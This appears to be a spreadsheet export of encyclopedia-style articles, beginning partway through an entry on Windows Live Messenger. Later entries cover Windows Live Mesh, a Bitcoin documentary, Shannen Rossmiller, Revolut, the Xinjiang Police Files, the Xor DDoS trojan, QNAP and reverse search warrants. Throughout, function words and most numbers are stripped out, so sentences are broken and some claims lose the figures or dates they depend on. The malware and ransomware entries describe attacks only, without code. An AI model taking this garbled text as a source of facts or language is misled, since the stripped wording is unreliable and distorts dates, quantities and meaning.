problem, users versions newer need update latest version, 14.0.8089. mandatory upgrade requirement would fully phased late october 2009 began september 2009. first beta windows live messenger 8.5, beta released 2007. update released june 2007, test updates installed microsoft update. this version required windows sp2, compared previous versions requiring windows sp1. first version installed "windows live" folder "program files," shortcuts placed "windows live" folder start menu. major changes additions beta included installation program conjunction release windows live 2.0, look windows matches aesthetic styles windows vista, "bunny" emoticon, integration windows live onecare family safety. beginning version, updates could downloaded installed microsoft update. second beta windows live messenger 8.5, beta released september 2007. several issues fixed beta significant changes applied. compared first beta, build "beta" window, although developers noted final release. windows live installer, used install windows live messenger beta windows server 2003. final release windows live messenger version released november 2007, introduced major changes. windows live messenger 14.0–16.4 (2009–2012) windows live messenger 2009 originally designated version 9.0, later assigned technical version number 14.0, order unified windows live programs microsoft office programs. presentation georgia institute technology's ieee student branch, microsoft employee andrew jenks reported messenger team working multi-person audio/video chat, also attempting create interoperability aim/xmpp/icq. there basic internal version works xmpp already. however, features seen versions windows live messenger 2009. microsoft sent invitation participate windows live messenger beta program microsoft connect members november 2007; week later, microsoft began sending emails welcoming windows live messenger beta program first release, known beta site windows live messenger, mess.be, claimed build windows live messenger august 2008, published screenshots along brief summary features. screenshots featured user interface design matching "wave design development microsoft. images later removed site dmca notice received. installer build leaked private forums august 2008. would later discovered build preview milestone news site liveside published article september 2008, screenshots newly minted "windows live messenger 2009," become version 14.0 instead previously expected. liveside summarized features, including protection messaging spam, ability stay signed application several computers (referred "multiple points presence support"), animated files photo area, per-contact customized sounds various user actions, clickable urls status area.microsoft began official beta program windows live messenger 2009 september 2008, released beta officially known windows live messenger 2009 beta (milestone build 14.0.5027.908), made available general public free download. ability submit feedback, however, restricted select participants microsoft connect closed beta program. notable changes milestone include revamped refined user interface follow suit rest windows live "wave design, ability "scene" customizing background image color contact list, display scenes conversation windows improved contact identification window management. milestone also brings "groups" feature allows users create continuous group conversation select contacts, newly redesigned status icons resemble small gems rather previous "messenger buddy" icons, default "favorites" category place favorite contacts easy access them, photo sharing utility allows contacts quickly easily browse photos together, "what's new" section bottom contact list outline recent contact updates. display pictures moved left side conversation windows, colorful borders appear around display pictures display current status contact. milestone first version windows live messenger standard window frame windows vista accordance user experience guidelines. several features removed version however, ability add-ins, ability transfer files recipient signed offline, right back," "out lunch," call" status options, space button, ability adjust webcam settings video call, send button, games (depending localization) integration windows contacts. other features replaced, sharing folders (replaced integration windows live skydrive) background sharing (replaced "scene" feature). december 2008, windows live messenger 2009 (build 14.0.8050.1202) released together windows live wave software applications, renamed windows live essentials. this version removal custom sign-in sound feature however still possible select sound individuals, well changes background image chosen applied conversation windows. this build also included fixes including "custom emoticon bug" saving pictures using photo sharing feature. january 2009, build released final version windows live messenger 2009.the last update wave released 2010, removal features windows live messenger. specifically, ability independently show webcam contacts' webcam (one webcam) without audio call gone. possible start video call starts webcams people communicating also automatically starts audio calling. also removed ability import save/export instant messaging contacts .ctt files.on june 2012, microsoft made update 2009 2011 mandatory using windows vista 2009 continues usable still running this circumvented running windows live messenger windows compatibility mode, thus making believe running windows xp.in late march 2010, beta windows live essentials wave leaked onto internet since spread various bittorrent networks, included private beta build windows live messenger wave however, software designed private beta testing, non-beta testers cannot sign leaked build.the software features revamped interface brings "what's new" section windows live "social pane", similar social networking site presents updates. among features tabbed conversations, redesign emoticons, integration bing results, built-in video message support, video chat, in-line commenting social updates, social photo viewer supports commenting (for facebook skydrive photos), badges support, synchronised status updates, availability categories, well integration facebook chat. however, several features also removed previous version, removal display names, handwriting tool, one-way webcam requests import/export instant messaging contacts feature. "wave release windows live essentials, includes messenger, also dropped compatibility windows runs windows vista windows 7.the windows live messenger became available store june 2010, addition mobile versions windows live messenger windows phone, blackberry, symbian mobile platforms.on june 2010, public beta windows live messenger wave released part windows live essentials beta. "beta refresh" windows live messenger wave released august 2010, part upgraded windows live essentials beta. final version windows live messenger 2011 (wave released september 2010. date, version windows live messenger zune also became available.on august 2012, microsoft delivered version windows essentials 2012 suite, includes windows live messenger 2012. discontinuation november 2012, microsoft announced messenger skype services would merge first quarter 2013. according tony bates (president skype division time), messenger users could sign skype using microsoft accounts, access messenger contacts communicate usual. january 2013, microsoft emailed messenger users informed exception mainland china, messenger service would stop working march 2013, users would able sign in.on february 2013, zdnet wrote discontinuation email sent percent messenger users, test group. day, microsoft announced plans phase messenger: process would start april 2013, english users would april 2013; messenger would remain available mainland china. according zdnet, might apply ability sign messenger client; microsoft would keep messenger service running another year. "windows live messenger upgrades skype," referred microsoft, started april 2013. this transition took place language language. brazil last country "upgraded," april chinese messenger users received email microsoft august 2014, containing announcement messenger service china would october 2014; users advised migrate skype receive free credits. features addition basic functionality general capability instant messaging client, latest version windows live messenger offered following features: album viewer windows live messenger's album viewer based windows photo gallery provides users photo viewing experience photo albums shared skydrive facebook. album viewer interactive supports full screen slideshow modes, well viewing uploading comments facebook skydrive albums. also supports people tagging skydrive. album viewer closely resembles microsoft silverlight counterpart photo albums present skydrive. appear offline individuals categories windows live messenger allows users appear offline particular individual contacts, well entire category within windows live messenger, appearing online contacts. this recent feature windows live messenger 2011, departure previous versions windows live messenger, blocking contact would prevent "blockee" sending user messages "blocker". with "appear offline configuration currently implemented, "hidden from" users still send "offline messages" target. social networks integration users connect services facebook, myspace linkedin using windows live profile, display contact's messenger social updates within "full view" windows live messenger. users also post status updates photos directly connected services within windows live messenger. additionally, messenger also imports contacts connected services integrates facebook chat (via xmpp protocol) instant messaging support users facebook. offline messaging send messages contacts offline; receive messages come online. additionally, user start conversations even status appear offline windows live messenger 2009 before. games applications there various games applications available windows live messenger accessed conversation window clicking games icon, challenging friend contact competition game, inviting launch shared external application. messenger companion windows live messenger companion add-in windows internet explorer detects user website friends shared content surfaces update user instantly view friends shared leave comment shared content windows live. service utilizes windows live integrates tightly windows live messenger obtain user's contact list shared contents. features windows live messenger companion include: sharing links pages user's friends windows live within browser links pages user's friends shared comments links user's friends sharedwindows live messenger companion made available part windows live essentials 2011. however, microsoft discontinued messenger companion newer windows essentials 2012 suite. protocol windows live messenger used microsoft notification protocol (msnp) (and optionally http deal proxies) connect microsoft messenger service—a service offered port 1863 "messenger.hotmail.com." protocol completely secret; microsoft disclosed version (msnp2) developers 1999 internet draft, never released versions higher public. messenger service servers currently accept protocol versions higher, syntax commands sent versions higher known using packet sniffers like wireshark. this easy task comparison many modern instant messaging protocols, xmpp microsoft notification protocol provide encryption everything captured easily using packet sniffers. lack proper encryption also makes wiretapping friend lists personal conversations trivial task, especially unencrypted public wi-fi networks. content filtering content users' messages filtered server side client. example, user can't send links pirate bay's pages neither windows live messenger, clients supporting protocol. however, links networks allowed. "i'm" initiative initiative program microsoft launched march 2007, connects user organizations dedicated social causes windows live messenger, conversations sent received usa. every time someone conversation using i'm, microsoft corp. shared portion program's advertising revenue organization user's choice. there amount donated organization. conversations user had, money went causes. each participating organization guaranteed minimum donation $100,000 first year program. initiative worked version above. march 2010, initiative concluded, raised million dollars. platforms messenger mobile (formerly named windows live messenger mobile) version messenger aimed used mobile devices cellular data plan wi-fi supported phone). there also wap-compatible version used mobile device, also specific client versions designed windows mobile, ios, blackberry nokia series devices. windows mobile client version windows live messenger mobile part client application named "windows live windows mobile" included windows mobile operating system. included windows mobile smartphone edition (non-touch screen phones) professional (touch screen phones). among features could send voice-clips (max seconds), pictures emoticons. xbox windows live messenger support included xbox spring 2007 dashboard update released 2007. known xbox live messenger.those using windows live messenger able gamertags friends logged xbox live, including games playing. xbox users could chat in-game watching movie. although text chat supported, microsoft suggested voice video chatting come future update. support child accounts added december 2007. coincide arrival integration windows live messenger xbox live, microsoft released xbox keyboard adapter called xbox messenger easier text input. keyboard device attaches standard xbox controller headphone jack features qwerty-style layout backlit keys. however, keyboard also compatible xbox 360. microsoft also announced june 2010, users xbox live controller-free kinect could real-time video conversations windows live messenger contacts. this feature enabled launch. (webtv) starting summer 2000, microsoft-owned access product (then known webtv) introduced software upgrade users internet terminals added basic messaging client among features. messaging client designed work microsoft messenger service simply named messenger. client original webtv/msn internet terminals supported basic presence, plain text messages graphical emoticons), buddy lists, overall webtv/msn service hosting services users add, remove, block messenger contacts manage messenger settings. windows live messenger support later added introducing rest interface support graphical emotions. it's believed clients still worked discontinuation service september 2013. although webtv also available japan well summer 2000 upgrade introduced u.s., appear japanese webtv users ever received messenger feature. microsoft messenger (previously messenger mac) official instant messaging client microsoft messenger service, developed macintosh business unit, division microsoft. feature list limited comparison counterpart windows live messenger; client lacked number features windows counterpart contained. versions later microsoft messenger featured aqua graphics, whereas version graphics similar windows messenger 4.0. versions used brushed metal theme. version 2.5.1, update version 2.5, mandatory update version available users running 9.2.2. version revisions older 10.2.8 version 4.0.1 revisions 10.2.8 newer version 5.1.1 revisions 10.3 newer version 6.0.3 revisions 10.3.9 newer version 7.0.0 10.4.9 newer released april 2008. version 7.0.1 10.4 later includes minor fixes. version 7.0.2 10.4 later: improves overall quality conversations microsoft office communicator 2007 version 8.0.0 beta 10.5 later, intel macs only: official beta released march, 24th 2010. adds conferencing users windows live messenger 2009 users. version 8.0.0 10.5 later, intel macs only: released microsoft office 2011 october 2010 bears visual similarity previous windows counterparts. features somewhat stable functional voice video calls.with release microsoft messenger 7.0, microsoft discontinued client's support older versions corporate messaging systems (such live communications server 2005). latest version support older systems version 6.0.3, still available download microsoft website. webcam audio support delayed windows live messenger's webcam audio engine reworked, meant version wait complete order platform releases function correctly. windows live messenger client supported receiving instant messaging notifications even application closed, allowed multiple points presence (mpop) user signed multiple locations time. photos albums could also uploaded mobile devices onto windows live photos, based skydrive, application allowed simple image editing capabilities people tagging within photos. application also supported "messenger social" feed windows live profile, allowing users view comment social updates activities contacts windows live, well facebook, myspace linkedin social networks connected windows live "service". java nokia series windows live messenger mobile client came java mobile application pre-loaded devices nokia 7610, nokia 7510, nokia 7210, nokia 6700c, nokia 6600s, nokia 6303c, nokia 6260s, nokia 5220, nokia 5130xm, nokia 3720c, nokia 3710f, nokia, 3600s, nokia 2730c, nokia 2700c, nokia 5530, nokia 6303c nokia sony ericsson version windows live messenger mobile client also pre-loaded sony ericsson mobile devices java application. symbian client windows live messenger developed microsoft symbian platform commonly used mobile phones nokia smartphones released august 2007, selected markets. 2009, client made available store. this version windows live messenger included many features windows live messenger client, including grouped contacts, voice clips (max seconds), image file sending; well features unique tabbed chat windows integration contact list features platform. when trial expires cost users messenger £1.50/$2.94 calendar days use. february 2009, microsoft stopped charging windows live mobile service offered free. interoperability october 2005, yahoo! microsoft announced plans interoperability messenger services. announcement came years third-party interoperability success (most notably, powwow tribal voice, trillian, pidgin) criticisms tribal voice icast major real time communications services locking networks. yahoo! windows live messenger became interoperable july 2006. years, yahoo! messenger windows live messenger users possession up-to-date software could communicate across networks. instant messaging well transmission emoticons, nudges, offline messages, presence information personal status messages supported. december 2012, interoperability ended.interoperability facebook chat added september 2010, launch windows live messenger 2011. also comparison instant messaging clients comparison instant messaging protocols microsoft lync messenger plus! live windows live messenger references</t>
  </si>
  <si>
    <t>Windows Live Mesh</t>
  </si>
  <si>
    <t>windows live mesh (formerly known windows live foldershare, live mesh, windows live sync) discontinued free-to-use internet-based file synchronization application microsoft designed allow files folders computers sync windows (vista later) 10.5 leopard later, intel processors only) computers skydrive. windows live mesh also enabled remote desktop access internet. windows live mesh part windows live essentials 2011 suite software. however application replaced skydrive windows application windows essentials 2012 later onedrive windows 8/8.1/10. microsoft announced december 2012 windows live mesh would discontinued february 2013. features features windows live mesh include: ability sync folders 100,000 files (each file pc-to-pc synchronization ability sync files "skydrive synced storage" cloud remote desktop access windows live mesh windows live devices service pc-to-pc synchronisation application settings applications windows internet explorer synchronisation favorites recently typed urls computers microsoft office synchronisation dictionaries, outlook email signatures, styles templates computers history foldershare windows live sync microsoft bought foldershare bytetaxi inc. november 2005, subsequently made part windows live range services.on march 2008, microsoft released first user visible update windows live foldershare. this comprised rewrite foldershare website updated windows live foldershare client. support discussion groups remote desktop search also removed update. client user interface branding updates contained several fixes including official support windows vista discontinued support windows 2000. since rebrand windows live foldershare, client service undergone extensive platform changes, switching original lamp originally built acquired, windows server platform. windows live essentials "wave release, windows live foldershare rebranded windows live sync. improvements also announced part "wave release, integrating windows live services. features windows live sync "wave compared foldershare included increased limit sync folders, integration windows live integration recycle bin, unicode support, support integration windows live photo gallery windows live toolbar sync photo albums favorites pcs. windows live sync wave released december 2008, update windows live sync released november 2009 support 10.6. live mesh beta microsoft released live mesh technology preview april 2008, data synchronization system allowed files, folders data shared synchronized across multiple personal devices web. live mesh based feedsync technologies convey changes made device changes synchronized across devices cloud. information devices folders participating synchronization relationship stored locally service-end. live mesh software, called mesh operating environment (moe), available windows windows vista, windows well windows mobile could used create manage synchronization relationships devices data. live mesh also included cloud storage component, called live desktop, online storage service allows synchronized folders accessible website. live mesh also provided remote desktop software called live mesh remote desktop could used remotely connect manage devices synchronization relationship. live mesh remote desktop allowed users control devices live mesh application, well internet connected live mesh also included developer component, consisted protocols application programming interfaces (api) known live framework (which also briefly known meshfx). rest-based accessing live mesh services http. microsoft also provided apis managed code (including .net framework microsoft silverlight) well win32 javascript developer software development (sdk). unlike mesh operating environment (moe), limited sharing folders, live framework apis could used share data item devices recognize data. encapsulated data mesh object—the native synchronization unit live mesh—which tracked changes synchronized. mesh object consisted collection data feeds, could represented atom, rss, json plain formats. data entries within feeds synchronized feedsync protocol. software also created mesh objects live mesh folder order synchronized. however, live framework apis discontinued september 2010 integrated windows live messenger connect "wave release. live mesh beta officially discontinued march 2011. windows live mesh 2011 beta version windows live sync "wave released june 2010. this version, initially branded windows live sync, first version built using foldershare live mesh technologies. compared "wave version windows live sync, version featured increased limit sync folders files, ability sync files cloud windows live skydrive synced storage, addition live mesh's remote desktop access windows live devices, ability sync application settings internet explorer microsoft office. this version windows live sync also designed completely separate previous versions windows live sync live mesh, previous synchronisation relationships retained upgraded windows live sync "wave live mesh. previous windows live sync "wave website, live mesh desktop, also replaced windows live devices service "wave release. beta subsequently updated august 2010, august 2010, service officially rebranded windows live mesh, cloud-based skydrive synced storage increased case previous live mesh service. version also allows users sync hidden files, view list missing files awaiting synchronised, various performance improvements. final version windows live mesh 2011 (wave released september 2010 part windows live essentials 2011. skydrive microsoft announced february 2012 windows live mesh superseded skydrive desktop application, cloud storage portion application utilize full skydrive storage user purchased additional storage), rather limited "skydrive synced storage" current version windows live mesh. however, skydrive desktop application support direct pc-to-pc synchronization, must utilize skydrive cloud storage synchronization devices. august 2012, microsoft released windows essentials 2012, announced windows live mesh would removed replaced skydrive windows desktop application user upgrades windows live essentials 2011.the remote desktop feature live mesh, allowed users access remote computer browser, transferred skydrive. users directed remote desktop windows computer instead. windows live mesh discontinued february 2013 functionality replaced skydrive.on january 2014, microsoft announced rebranding skydrive "onedrive". references external links official website (archive)</t>
  </si>
  <si>
    <t>The Rise and Rise of Bitcoin</t>
  </si>
  <si>
    <t>rise rise bitcoin 2014 american documentary film directed nicholas mross. film interviews multiple companies people played important roles history expansion bitcoin. first premiered tribeca film festival york april 2014. film nominated “best international documentary film” 2014 zurich film festival. film time minutes.the documentary included footage gabriel sukenik, zach harvey, erik voorhees, yifu guo, gavin andresen, brian armstrong, fred ehrsam, mark karpeles, vitalik buterin, julian assange, berners-lee, george bush ross ulbricht. rise rise bitcoin's writers advised academics consultants, daniel mross, charlie shrem, alex waters, jered kenna, trace mayer, andrew lokenauth, nicholas mross patrick lope. synopsis documentary follows 35-year-old computer programmer daniel mross. job, kids, marriage, daniel avid enthusiast cryptocurrency bitcoin. discovered bitcoin 2011, fascinated anything daniel brother producer, nicholas mross, decided start filming believe could really future currency, filming documentary expedite process. this, able educate anyone watched film. throughout daniel's journey around world, meets individuals leading potential financial revolution. daniel people interviews pioneers adventuring mysterious concept. future goes show everyone involved bitcoin early made unscathed. development daniel nicholas mross came idea documentary difficulty daniel experienced attempting explain bitcoin peers. interview, daniel states “and found short time really difficult talk people bitcoin know explain it's something that, know, especially earlier easy explain somebody minutes.”. this documentary acts bridge educated bitcoin technology interested educating themselves. reception rotten tomatoes, reviewer aggregate, film rated based reviews. those reviews average rating 10.the york times critiqued film sidestepping economists' past criticisms bitcoin economy. variety's dennis harvey criticized film overly positive tone towards bitcoin, felt "consistent rah-rah tenor makes nicholas mross’ documentary less interesting could since shies away tough questions simply chase enthusiasm demonstrated bitcoin supporters."common sense media rated movie stars, stating "although viewers still questions afterward, animated visuals explain bitcoin transactions work interviews bitcoin's earliest users pioneers provides basic understanding currency's role today's society." also bitcoin bitcoin network cryptocurrency references external links rise rise bitcoin rise rise bitcoin imdb</t>
  </si>
  <si>
    <t>Shannen Rossmiller</t>
  </si>
  <si>
    <t>shannen rossmiller (may 1970 november 2020) american lecturer instructor cyber counter-intelligence forensics former montana municipal court judge controversial role vigilante online terrorist-hunter, part 7seas group.a former high school cheerleader, paralegal, mother three, rossmiller posed online militant anti-american muslim radicals attract similar mindsets. while still member 7-seas group, provided evidence arrest conviction ryan anderson, national guardsman deploy u.s. iraq. ryan serving life sentence seeking enemy time attempted espionage.in 2005, posing online qaeda financier, rossmiller offered transient michael reynolds $40,000 purchase fuel trucks attack american pipelines. reynolds arrested attempted pick money. 2007, convicted jury attempting provide material support qaeda related charges, sentenced years jail.rossmiller appeared 2005 documentary entitled al-qaeda. she, along internet cyber sleuths, criticized work.as july 2007, publicist seeking book movie deal based rossmiller's story, 2011 published book entitled unexpected patriot. november 2020, shannen died complications related graves' disease. also list first women lawyers judges montana references external links official website</t>
  </si>
  <si>
    <t>Revolut</t>
  </si>
  <si>
    <t>revolut british financial technology company offers banking services. headquartered london, founded 2015 nikolay storonsky vlad yatsenko. offers accounts featuring currency exchange, debit cards, virtual cards, apple pay, interest-bearing "vaults", commission-free stock trading, crypto, commodities, services. revolut expanded markets japan expanded staff 1500 around 5000. november 2020 breaking even and, £4.2 billion valuation became uk's valuable fintech company. january 2021 applied banking licence. us$800 million funding round july 2021 brought company's valuation us$33 billion, making valuable tech startup time. history revolut founded july 2015 nikolay storonsky russia vlad yatsenko ukraine. company originally based level39, financial technology incubator canary wharf, london.on april 2018, revolut raised $250 million series funding. post-funding valuation us$1.7 billion, making unicorn. global founded yuri milner, backed kremlin previous investments.in december 2018, revolut secured challenger bank licence european central bank, facilitated bank lithuania, authorising accept deposits offer consumer credits, provide investment services. time, electronic money institution licence also issued bank lithuania.in march 2019 revolut united dax, same year company's chief financial officer peter o'higgins resigned. techcrunch reported quit following allegations compliance lapses, however revolut denied left reasons.in july 2019, revolut launched commission-free stock trading york stock exchange nasdaq, initially customers metal plan. this subsequently made available users.in august 2019, company announced several hires experience traditional banking, including wolfgang bardorf, formerly executive director goldman sachs global head liquidity models methodologies deutsche bank, philip doyle, previously head financial crime clearbank fraud prevention manager visa, stefan wille, previously senior vice-president finance corporate finance manager credit suisse.in october 2019, company announced global deal visa, following expanded markets hired around 3500 additional staff.in february 2020, revolut completed funding round tripled value, valuing company £4.2 billion becoming united kingdom's valuable financial technology startup.in march 2020, revolut launched united states. august, company launched financial japan.in november 2020, revolut became profitable.in january 2021, company announced applied banking licence. march 2021, revolut applied bank charter applications fdic california department financial protection.in july 2021, revolut raised us$800 million investors, including softbank group tiger global management, us$33 billion valuation.in january 2022, revolut launched bank (instead e-money institution) additional european countries: belgium, denmark, finland, germany, iceland, lichtenstein, luxembourg, netherlands, spain, sweden.in march 2022, russia invaded ukraine, storonsky publicly opposed ukraine revolut donated £1.5 million cross ukraine appeal. since march 2022, revolut million customers around world million transactions month. services revolut offers banking services including bank accounts, debit cards, fee-free currency exchange, stock trading, cryptocurrency exchange peer-to-peer payments. revolut's mobile supports spending withdrawals currencies transfers currencies directly app. payments weekends incur extra 0.5% protecting exchange rate fluctuations.it also provides customers access cryptocurrencies bitcoin, ethereum, litecoin, bitcoin cash, exchanging fiat currencies. 1.5% buying selling applies. crypto cannot deposited spent, converted back fiat inside revolut. additionally, revolut banks metropolitan commercial bank york, allow transfer fiat money cryptocurrency exchanges. provides equities trading facility, access range stocks fractional share purchase/sale. stocks purchased cannot transferred another broker, must sold/converted back cash, withdrawn. controversies automated suspension accounts revolut, common traditional financial institutions, uses algorithms identify money laundering, fraud criminal activity, unlike rest banking industry, revolut's algorithms additionally trigger automated suspension accounts. revolut explains "the system programmed temporarily lock account place queue, compliance agents review case".it reported past revolut's algorithms suspend accounts error weeks months time revolut sufficient compliance agents review automated suspensions sooner. while revolut paid interest large suspended balances, could earn interest funds wholesale money markets. customers whose accounts suspended blocked contacting revolut's usual chat support channel instead received automated responses chatbot. daily telegraph reported february 2020 revolut suspended account containing £90,000 months another customer travelled miles auvergne france revolut's london offices unsuccessful attempt recover £15,000 account revolut similarly frozen without justification given. case reported times, revolut suspended subsequently closed business account containing €300,000 belonging priorité energie, "helps low-income families paris insulate homes government initiative", preventing company paying staff.according finews.com, revolut's public internet forums 2020 contained almost complaints customers locked accounts lack response revolut's support team. employment practices march 2019, wired published exposé company's employment practices work culture. this found evidence unpaid work, high staff turnover employees ordered work weekends meet performance indicators. later article december 2019 sifted noted revolut higher rating peers glassdoor.in june 2020, wired published exposé revolut's dismissal employees covid-19 pandemic, employees, particularly kraków, given choice terminated underperformance mutual agreement leave company voluntarily, order reduce headline number redundancies announced revolut. report explained "current former revolut employees staff coerced accepting terminations, even though company legal grounds fire them" employees porto pressured agreeing salary sacrifice scheme order keep jobs. according wired, message sent 495-strong customer support team slack shortly salary sacrifice scheme announced, head support inna grynova urged participate: far, almost cent employees globally submitted sacrifices. support we’ve gathered submitions [sic] (out employees) small number. goal alternative need employees redundancy cost cuts. success depends won’t enough, unfortunately would need steps, we’ll avoid. positive impact achieved work together.” also bunq klarna wise (company) references external links official website media related revolut wikimedia commons</t>
  </si>
  <si>
    <t>Xinjiang Police Files</t>
  </si>
  <si>
    <t>xinjiang police files leaked documents xinjiang internment camps, forwarded anthropologist adrian zenz anonymous source. 2022, international consortium fourteen media companies published information files, consist gigabytes size speeches, images, spreadsheets protocols dating back 2018.the xinjiang police files published time human rights commissioner michelle bachelet started visit china briefing included exploring situation uyghurs xinjiang part visit. background according united nations, million uyghurs turkic groups held chinese government camps 2018. existence china's "re-education" extrajudicial program mass detention first detected satellite photos, testimonies uyghur refugees. documents leak collected mass detention program's highest level intensity.initially, china denied existence xinjiang camps; 2018, chinese government started referring camps "vocational training schools", attendance voluntarily. china also referred system "de-radicalization" program.a previous investigation xinjiang large group media organisations occurred 2019, released name china cables. this leak, based classified chinese government documents, exposed operations manual xinjiang detention camps region's system mass surveillance. xinjiang police files leak second major data leak related xinjiang, pages internal documents leaked 2019.the xinjiang police files documents obtained adrian zenz, senior fellow victims communism memorial foundation, subsequently shared documents group news organizations. according zenz, files made available "hacking attack directly police computers even computers detention camps" public security bureau computer systems kashgar governorates xinjiang. data evaluated several weeks joint research media consortium partially checked authenticity.the leak coincided first visit u.n. human rights diplomat since 2005. according zenz, timing intentional. contents xinjiang police files contain thousands pictures documents xinjiang counties konasheher tekes, contains details internment 20,000 uyghurs. files contradict china's official reading mass internment facilities "professional training facilities" visited voluntarily, served fight poverty directed extremist ideas.according media reports, chinese government data, classified "confidential" "internal," including thousands analyzed documents, photos, transcripts speeches senior party officials, official orders, training materials, showed extent persecution mass detentions xinjiang 2018. 2022, xinjiang police files comprehensive publicized leak state re-education camps xinjiang. zenz wrote journal article based contents files, titled xinjiang police files: re-education camp security political paranoia xinjiang uyghur autonomous region published journal european association chinese studies documents documents leak include confidential government documents, well speeches chinese officials, internal police documents tutorials.two documents june 2018 transcripts speeches zhao kezhi chen quanguo. document, marked "confidential", outlines surveillance measures implemented yili visit european diplomats, directed security officers "strictly" monitor contacts work. files include details protocols governing policing facilities, making clear armed officers throughout camps, watchtowers contain machine posts sniper rifles.in protocols, blindfolds, handcuffs shackles specified transfers detainees, either facilities externally, example hospital. leak also details "shoot-to-kill" policy anyone trying escape. this issued chen quanguo, role xinjiang's party secretary member politburo chinese communist party time 2018. chen also called officials "exercise firm control religious believers".another document, labeled among "most striking" international consortium investigative journalists (icij), spreadsheets containing information 8,000 detainees konasheher. according leak, least camps konasheher cells holding detainees solitary confinement, documents indicate 10,000 people konasheher county recommended detention, closer examination, integrated joint operations platform. files include list titled "relatives detained", which, taken information, indicates widespread "guilt association". year apparently held captive related detained persons.one document spreadsheet titled "persons subjected strike hard religion"; lists people sentenced religious activities deemed illegal, studying quran. images among pictures included leak mugshots 2,800 people, pictures showing "dazed men, women teenagers staring blankly camera". total, contains 5,074 mugshots photographed january july 2018, possibly collect biometric data. according zenz's analysis, 2,900 detained pictures taken, range age. detainees minors.besides mugshots, images included. among pictures interrogations, photo showing young hands feet shackled "tiger chair", surrounded heavily armored guards. reactions according international consortium investigative journalists, leak "irrefutable evidence highly militarized nature camps present stark contrast those, previously published, taken government-organized press tours", well stating "taken together, photographs documents refute chinese government's claims camps merely 'educational centers'".the chinese government denied accusations human rights violations, calling "fabricated lies disinformation", stating call "training centers" used poverty "de-radicalize" extremists. pengyu, spokesman chinese embassy washington d.c., told icij "xinjiang taken host decisive, robust effective deradicalization measures". chinese foreign ministry spokesperson wang wenbin called leak "the latest example anti-china forces trying smear china", stating "[i]t repetition tricks. spreading rumours lies cloud judgment world cannot cover fact xinjiang enjoys stability prosperity, residents living happy fulfilling lives".on 2022, british foreign secretary truss asked "unfettered access region [bachelet] conduct thorough assessment facts ground". also stated leaked files contained "shocking details china's human rights violations"german foreign minister annalena baerbock called transparent investigation “shocking reports evidence serious human rights violations xinjiang”. german minister economy robert habeck called latest leak "particularly shocking".on 2022, secretary state antony blinken said "genocide crimes humanity ongoing" xinjiang province, china "restricted manipulated" human rights commissioner michelle bachelet's visit. linda thomas-greenfield, ambassador united nations, tweeted: "horrified xinjiang police files, spotlight china's mass incarceration uyghurs ethnic religious minorities." also china cables, november 2019 xinjiang papers, november 2019 xinjiang victims database notes references external links archive xinjiang police files project victims communism memorial foundation zenz, adrian (2022). "the xinjiang police files: re-education camp security political paranoia xinjiang uyghur autonomous region". journal european association chinese studies. doi:10.25365/jeacs.2022.3.zenz.</t>
  </si>
  <si>
    <t>Xor DDoS</t>
  </si>
  <si>
    <t>ddos linux trojan malware rootkit capabilities used launch large-scale ddos attacks. name stems heavy usage encryption malware network communication c&amp;cs. built multiple linux architectures like arm, x64. noteworthy ddos ability hide embedded rootkit component obtained multiple installation steps. discovered september 2014 malwaremustdie, white malware research group. from november 2014 involved massive brute force campaign lasted least three months. order gain access launches brute force attack order discover password secure shell services linux. once secure shell credentials acquired login successful, uses root privileges script downloads installs ddos. believed asian origin based targets, tend located asia. also references</t>
  </si>
  <si>
    <t>QNAP Systems</t>
  </si>
  <si>
    <t>qnap systems, inc. (chinese: 威聯通科技) taiwanese corporation specializes network-attached storage (nas) appliances used file sharing, virtualization, storage management surveillance applications. headquartered xizhi district, taipei city, taiwan, qnap offices countries employs 1000 people around world. qnap member intel intelligent systems alliance since 2011. company history qnap originally existed department within integration corporation, industrial computing service provider located taiwan. 2004, qnap systems inc. spun separate company. company milestones july 2020 qutscloud c4.5.1 released. october 2020 4.5.1 released. november 2020 quts hero h4.5.1 released. product overview qnap primarily produces network-attached storage (nas) appliances. company also produces network video recorders (nvr) series networking equipment. operating system devices (qnap enterprise storage) quts hero operating system similar implements qutscloud qurouter qnap qhora-301w supports high-speed wi-fi 10gbe connections, also providing enterprise-grade sd-wan allow multi-site deployment cloud. vulnerabilities while qnap appliances suffer serious vulnerabilities, company usually react rapid manner. instance, 2020, complete device takeover discovered security group, reported qnap, company took five months take care time, vulnerability already made public.in april 2021, critical vulnerabilities hardcoded admin passwords firmware, force installing vulnerable version backup application, massive ransomware attack named "qlocker" compressed files smaller files using 7-zip character long password. order retrieve password, users access .onion webpage 0.01 btc. this caused losses $300,000 users. achievements 2019 ts-1677x named best device european hardware awards 20192018 received computex best choice award 20182017 ts-451+ named best device european hardware awards 20172016 received computex best choice award 20162014 received 27001:2013 certification information security management received 2014 product design award featured pcworld's best tech products 2013 also list companies taiwan references external links official website qnap systems's channel youtube qnap blog</t>
  </si>
  <si>
    <t>Reverse search warrant</t>
  </si>
  <si>
    <t>reverse search warrant type search warrant used united states, enforcement obtains court order information technology companies identify group people suspects crime. they differ traditional search warrants, typically apply specific individuals. geo-fence warrants, seek data mobile phone users specific location given time, keyword warrants, request information users searched specific phrases, types reverse search warrants. history reverse location warrants first used 2016, become increasingly widely used united states enforcement. google reported received reverse location warrants 2018, 8,396 2019, 11,554 2020. 2021 transparency report showed data requests enforcement google geo-fence data requests. google common recipient reverse location warrants main provider data, although companies including apple, snapchat, lyft, uber also received warrants. types geo-fence warrant geo-fence warrants, also called reverse location warrants, seek compel data search engine companies technology companies collect mobile location data, determine users specific location given time. keyword warrant keyword search warrants seek compel search engine companies release data users searched specific phrases—for example, address later location crime. keyword warrants comparatively rare used request data companies including google, microsoft, yahoo since least 2017. genealogy database warrants companies collect data received warrants enforcement seeking access databases. gedmatch family tree cooperated requests, larger companies like ancestry.com 23andme stated would fight attempts enforcement. these warrants attempt connect samples crime scenes data belonging commercial testing companies. even perpetrator crime submitted data companies, samples belonging relatives, even quite distant ones, used identify suspects criminals. legality some lawyers privacy experts argued reverse search warrants unconstitutional fourth amendment united states constitution unauthorized stored communications act, notwithstanding third-party doctrine. fourth amendment specifies warrants issued "upon probable cause, supported oath affirmation, particularly describing place searched, persons things seized." some lawyers, legal scholars, privacy experts likened reverse search warrants general warrants, permitted fourth amendment. although judges authorized geofence warrants, least federal judges ruled warrants violate fourth amendment's requirements probable cause particularity.groups including york civil liberties union surveillance technology oversight project joined state senator zellnor myrie assembly member quart 2020 begin work legislation york would prohibit geo-fence keyword warrants. groups including electronic frontier foundation opposed geofence warrants amicus briefs filed motions quash orders disclose geofence data. also dragnet (policing) references</t>
